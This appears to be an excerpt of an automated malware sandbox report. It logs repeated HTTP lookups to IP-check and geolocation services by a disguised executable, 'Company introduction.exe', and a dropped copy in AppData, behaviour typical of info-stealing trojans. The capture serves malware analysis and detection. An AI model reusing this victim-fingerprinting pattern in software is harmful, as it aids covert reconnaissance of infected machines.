                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Jan 15, 2025 08:39:05.144056082 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:05 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.449737193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:05.691999912 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:06.312624931 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:06 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                  Jan 15, 2025 08:39:06.316016912 CET127OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Jan 15, 2025 08:39:06.501981020 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:06 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                  Jan 15, 2025 08:39:07.225227118 CET127OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Jan 15, 2025 08:39:07.410420895 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:07 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.449738193.122.6.168807812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:05.782098055 CET127OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Jan 15, 2025 08:39:06.408117056 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:06 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.449742193.122.6.168807812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:07.033612013 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:07.667814970 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:07 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.449745193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:08.017352104 CET127OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Jan 15, 2025 08:39:08.652220964 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:08 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.449746193.122.6.168807812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:08.290771961 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:08.917781115 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:08 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.449749193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:09.272509098 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:09.906088114 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:09 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  7192.168.2.449750193.122.6.168807812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:09.525104046 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:10.149517059 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:10 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  8192.168.2.449753193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:10.524418116 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:11.158901930 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:11 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  9192.168.2.449754193.122.6.168807812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:10.778608084 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:11.401498079 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:11 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  10192.168.2.449757193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:11.788259983 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:12.423669100 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:12 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  11192.168.2.449758193.122.6.168807812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:12.075045109 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:12.706100941 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:12 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  12192.168.2.449761193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:13.021369934 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:13.647267103 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:13 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  13192.168.2.449762193.122.6.168807812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:13.338157892 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:13.967593908 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:13 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  14192.168.2.449765193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:14.442634106 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:14.999947071 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:14 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  15192.168.2.449769193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:15.617134094 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:16.274338007 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:16 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.449734104.21.48.14437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:04 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:04 UTC855INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:04 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241534
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tISPHQTfRX0mAXWdcaiDs8jl3azs1yQ8vYSijG8%2FazcFEcIGz0nhh0pxQFWCPgVRPICG5%2FIXMXNrOC1dhA3XLbeRAs3Ga4DHEWWneSvRI3EQmVuQm98XmJdQKPIBBk3T%2BJsZFONC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435bb8efd42e9-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1649&rtt_var=706&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1770770&cwnd=241&unsent_bytes=0&cid=94e8cf49d9cad8c0&ts=229&x=0"
